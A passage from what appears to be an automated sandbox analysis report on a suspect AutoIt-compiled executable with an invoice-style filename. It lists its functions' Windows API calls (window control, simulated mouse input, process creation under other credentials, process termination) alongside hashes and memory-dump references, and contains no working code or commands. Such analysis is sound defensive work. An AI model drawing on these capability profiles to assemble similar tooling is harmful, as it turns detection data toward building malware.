                                          • Instruction ID: cfd84bc0c1a49f03e0d21a8edec3b734f20e95aef7b09137c1342b5747c06168
                                          • Opcode Fuzzy Hash: 6ce66d664cb3224d9c1a254feca6ccc63a2c1dfd2dde3d3021a463d1a7772b74
                                          • Instruction Fuzzy Hash: 4A51C170A00305DFDF28CFA8D888AADBBF4AF56319F10596DEE15BB290D7709948CB51
                                          Function 00DF1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00DF179A
                                          • GetWindowRect.USER32(?,?), ref: 00DF17FE
                                          • ScreenToClient.USER32(?,?), ref: 00DF181B
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DF182C
                                          • EndPaint.USER32(?,?), ref: 00DF1876
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          • Opcode ID: 47b8fff2b5417d9a0dee9c804b9583e2093c7f503db4fc83d81473eb136ac030
                                          • Instruction ID: 7f178cbcf8fbe34dc71a921524bb3c67162d47ad7bfc0b6d815efe4f84ffb4e2
                                          • Opcode Fuzzy Hash: 47b8fff2b5417d9a0dee9c804b9583e2093c7f503db4fc83d81473eb136ac030
                                          • Instruction Fuzzy Hash: B241BC74100204EFD710DF65DC85BBA7BF8EB49724F048628FAA8AA2A1C7319849DB71
                                          Function 00E7B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(00EB67B0,00000000,017959C8,?,?,00EB67B0,?,00E7B862,?,?), ref: 00E7B9CC
                                          • EnableWindow.USER32(00000000,00000000), ref: 00E7B9F0
                                          • ShowWindow.USER32(00EB67B0,00000000,017959C8,?,?,00EB67B0,?,00E7B862,?,?), ref: 00E7BA50
                                          • ShowWindow.USER32(00000000,00000004,?,00E7B862,?,?), ref: 00E7BA62
                                          • EnableWindow.USER32(00000000,00000001), ref: 00E7BA86
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E7BAA9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: 4bdabae640fdeeea62303ae86c248396eec266c61a89cda274d2242b3bc9b4d4
                                          • Instruction ID: abe442a27e78aa9247cf16218a1f6055387a7a90710db1aabb66501f4292ff1c
                                          • Opcode Fuzzy Hash: 4bdabae640fdeeea62303ae86c248396eec266c61a89cda274d2242b3bc9b4d4
                                          • Instruction Fuzzy Hash: E9416030600241AFDB26DF65C489B957BE0FF45318F1892B9FA5CAF2A2C731E845CB51
                                          Function 00E673B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00E65134,?,?,00000000,00000001), ref: 00E673BF
                                            • Part of subcall function 00E63C94: GetWindowRect.USER32(?,?), ref: 00E63CA7
                                          • GetDesktopWindow.USER32 ref: 00E673E9
                                          • GetWindowRect.USER32(00000000), ref: 00E673F0
                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E67422
                                            • Part of subcall function 00E554E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E5555E
                                          • GetCursorPos.USER32(?), ref: 00E6744E
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E674AC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                          • String ID:
                                          • API String ID: 4137160315-0
                                          • Opcode ID: 18ca42f7320b2d43cdea51859d71527b6834a336a10118f86d21f2ffa9fa560a
                                          • Instruction ID: 63e1f600e7373d3fd1b68d94dae32520c844ce896ab04a5fe4e937313303a3bb
                                          • Opcode Fuzzy Hash: 18ca42f7320b2d43cdea51859d71527b6834a336a10118f86d21f2ffa9fa560a
                                          • Instruction Fuzzy Hash: 28310472508305AFC720DF55D849F9BBBE9FF88358F000919F899A7191DB30E948CB92
                                          Function 00E48D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E485F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E48608
                                            • Part of subcall function 00E485F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E48612
                                            • Part of subcall function 00E485F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E48621
                                            • Part of subcall function 00E485F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E48628
                                            • Part of subcall function 00E485F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E4863E
                                          • GetLengthSid.ADVAPI32(?,00000000,00E48977), ref: 00E48DAC
                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E48DB8
                                          • HeapAlloc.KERNEL32(00000000), ref: 00E48DBF
                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E48DD8
                                          • GetProcessHeap.KERNEL32(00000000,00000000,00E48977), ref: 00E48DEC
                                          • HeapFree.KERNEL32(00000000), ref: 00E48DF3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 3008561057-0
                                          • Opcode ID: 65654a9b9e3f08ed9fe16b366c7a1969d96fbccbe74f90575bed530a0ceb888f
                                          • Instruction ID: e9d9b278689b703d24527bfe611202a6aaaa341ce21a3a0919fd55bb4505230d
                                          • Opcode Fuzzy Hash: 65654a9b9e3f08ed9fe16b366c7a1969d96fbccbe74f90575bed530a0ceb888f
                                          • Instruction Fuzzy Hash: 1511CA31902A04EFDB10DFA5ED08BBE7BADEB41319F104129E849A3251CB329944DB60
                                          Function 00E48AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E48B2A
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00E48B31
                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E48B40
                                          • CloseHandle.KERNEL32(00000004), ref: 00E48B4B
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E48B7A
                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E48B8E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 1413079979-0
                                          • Opcode ID: 13940f0f33b4ebc1e88483362387714755f77650ba24373ec9320dffc461e01d
                                          • Instruction ID: 8872e46f6ace6210f17157398191d74b4ec3f490f4402c1d45143c0436793cc5
                                          • Opcode Fuzzy Hash: 13940f0f33b4ebc1e88483362387714755f77650ba24373ec9320dffc461e01d
                                          • Instruction Fuzzy Hash: A21147B6500209AFDF01CFA5ED49FDE7BA9FF08349F045065FA08B2160C6729DA4AB60
                                          Function 00E7C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DF134D
                                            • Part of subcall function 00DF12F3: SelectObject.GDI32(?,00000000), ref: 00DF135C
                                            • Part of subcall function 00DF12F3: BeginPath.GDI32(?), ref: 00DF1373
                                            • Part of subcall function 00DF12F3: SelectObject.GDI32(?,00000000), ref: 00DF139C
                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E7C1C4
                                          • LineTo.GDI32(00000000,00000003,?), ref: 00E7C1D8
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E7C1E6
                                          • LineTo.GDI32(00000000,00000000,?), ref: 00E7C1F6
                                          • EndPath.GDI32(00000000), ref: 00E7C206
                                          • StrokePath.GDI32(00000000), ref: 00E7C216
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          • Opcode ID: 5a6475668213a8aa8d4758c9e108ede0e4c3f66b42f3c18575794b002ea371c1
                                          • Instruction ID: 3d4cc62784bd151331cb6a72745acbd3784121a93a350017baa77fd13cb84b1c
                                          • Opcode Fuzzy Hash: 5a6475668213a8aa8d4758c9e108ede0e4c3f66b42f3c18575794b002ea371c1
                                          • Instruction Fuzzy Hash: 8811097640014CBFDB119F91EC88EAA7FADEB08354F048025FA186A162C7719D99DBA0
                                          Function 00E103A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E103D3
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E103DB
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E103E6
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E103F1
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E103F9
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E10401
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          • Opcode ID: dae2f7f794d17cef2d3d6360a31311cfc3b9292b6c7f12e32bc9fd5a8390c536
                                          • Instruction ID: ca94f48baad73df60253ee3054548406a431e4a927bad1ee5c455db9f192d7f7
                                          • Opcode Fuzzy Hash: dae2f7f794d17cef2d3d6360a31311cfc3b9292b6c7f12e32bc9fd5a8390c536
                                          • Instruction Fuzzy Hash: F4016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BE15C47941C7F5A868CBE5
                                          Function 00E5568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E5569B
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E556B1
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00E556C0
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E556CF
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E556D9
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E556E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: e0814fdbab51ce9d50f1af797a24243cc91a207ff71f30f3052b9ea8074d2b1a
                                          • Instruction ID: 90c2915977462a01e7d03d637b6f8f65743cd2c4d82ff901fb9e9a2239422db1
                                          • Opcode Fuzzy Hash: e0814fdbab51ce9d50f1af797a24243cc91a207ff71f30f3052b9ea8074d2b1a
                                          • Instruction Fuzzy Hash: F8F06D32241158BFE3209BA39C0DEAB7B7CEBC6B12F000169FA08E105196A01A45C6B5
                                          Function 00E574D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 00E574E5
                                          • EnterCriticalSection.KERNEL32(?,?,00E01044,?,?), ref: 00E574F6
                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00E01044,?,?), ref: 00E57503
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E01044,?,?), ref: 00E57510
                                            • Part of subcall function 00E56ED7: CloseHandle.KERNEL32(00000000,?,00E5751D,?,00E01044,?,?), ref: 00E56EE1
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E57523
                                          • LeaveCriticalSection.KERNEL32(?,?,00E01044,?,?), ref: 00E5752A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: 589da70361c6fa68a2a886648499e4ad74f7fd482ca2df6296ac873d95afe2ef
                                          • Instruction ID: ff443f27a6e6d06b5a896505df9a785e4ec4bdf7913a3d406b37a90c4748e223
                                          • Opcode Fuzzy Hash: 589da70361c6fa68a2a886648499e4ad74f7fd482ca2df6296ac873d95afe2ef
                                          • Instruction Fuzzy Hash: 97F09A3A444612EFDB115B24FC889EA372ABF04302F001531FA06B10B6DF715898CAA0
                                          Function 00E48E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E48E7F
                                          • UnloadUserProfile.USERENV(?,?), ref: 00E48E8B
                                          • CloseHandle.KERNEL32(?), ref: 00E48E94
                                          • CloseHandle.KERNEL32(?), ref: 00E48E9C
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E48EA5
                                          • HeapFree.KERNEL32(00000000), ref: 00E48EAC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: dabc2cf1636516c2aaf6b8f31bd1fccb7de8b91069bfd002af555b862f57a8de
                                          • Instruction ID: a9aa564086a191854e64c607c0b25ec398fe8ef25590cbf763787e5b2fc55d66
                                          • Opcode Fuzzy Hash: dabc2cf1636516c2aaf6b8f31bd1fccb7de8b91069bfd002af555b862f57a8de
                                          • Instruction Fuzzy Hash: 4CE0C236004001FFDA019FF2EC0C90ABB69FB89322B508231F21DA2471CB3294A8EB60
                                          Function 00E47A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                          Download Yara Rule
                                          APIs
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E82C7C,?), ref: 00E47C32
                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E82C7C,?), ref: 00E47C4A
                                          • CLSIDFromProgID.OLE32(?,?,00000000,00E7FB80,000000FF,?,00000000,00000800,00000000,?,00E82C7C,?), ref: 00E47C6F
                                          • _memcmp.LIBCMT ref: 00E47C90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID: ,,
                                          • API String ID: 314563124-1556401989
                                          • Opcode ID: b631ef66a2f4c7aff04e3de46666c7f489936d950a139adc7606ae60e9162ad4
                                          • Instruction ID: 658234a3aef532e7f66da74179a5daf9aead1134f3e06aa90e5192d527d2aeb0
                                          • Opcode Fuzzy Hash: b631ef66a2f4c7aff04e3de46666c7f489936d950a139adc7606ae60e9162ad4
                                          • Instruction Fuzzy Hash: A4811A71A00109EFCB04DF94D984EEEB7BAFF89315F204199E545BB250DB71AE05CBA0
                                          Function 00E68902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00E68928
                                          • CharUpperBuffW.USER32(?,?), ref: 00E68A37
                                          • VariantClear.OLEAUT32(?), ref: 00E68BAF
                                            • Part of subcall function 00E57804: VariantInit.OLEAUT32(00000000), ref: 00E57844
                                            • Part of subcall function 00E57804: VariantCopy.OLEAUT32(00000000,?), ref: 00E5784D
                                            • Part of subcall function 00E57804: VariantClear.OLEAUT32(00000000), ref: 00E57859
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          • Opcode ID: e1355ca7ac779fa42ebe92a736305a67caf28a0a4772bcd2cf39eab793851e33
                                          • Instruction ID: d14e4074a941c08c343982caa1d3d7316eaee96f664b6c93e7d0b0b0544ba4ee
                                          • Opcode Fuzzy Hash: e1355ca7ac779fa42ebe92a736305a67caf28a0a4772bcd2cf39eab793851e33
                                          • Instruction Fuzzy Hash: 1F91BD746083019FC710DF24D58096ABBE4EF88354F049A2EF99AAB361DB30E945CB62
                                          Function 00E52F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E0FEC6: _wcscpy.LIBCMT ref: 00E0FEE9
                                          • _memset.LIBCMT ref: 00E53077
                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E530A6
                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E53159
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E53187
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          • Opcode ID: 64bd32aaf0c5dd72238a9317e9ef38e0887652106ec19887d4a1a67cb00a2333
                                          • Instruction ID: e9038d1f11605a595357375aa0c94987ef418dbcd33a8f6dd856299999a8bf6c
                                          • Opcode Fuzzy Hash: 64bd32aaf0c5dd72238a9317e9ef38e0887652106ec19887d4a1a67cb00a2333
                                          • Instruction Fuzzy Hash: FE51DF326093009AD7259A38C945AABB7E4EF45395F042E2DFD95F3191DB70CE4887A2
                                          Function 00E52C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E52CAF
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E52CCB
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00E52D11
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EB6890,00000000), ref: 00E52D5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
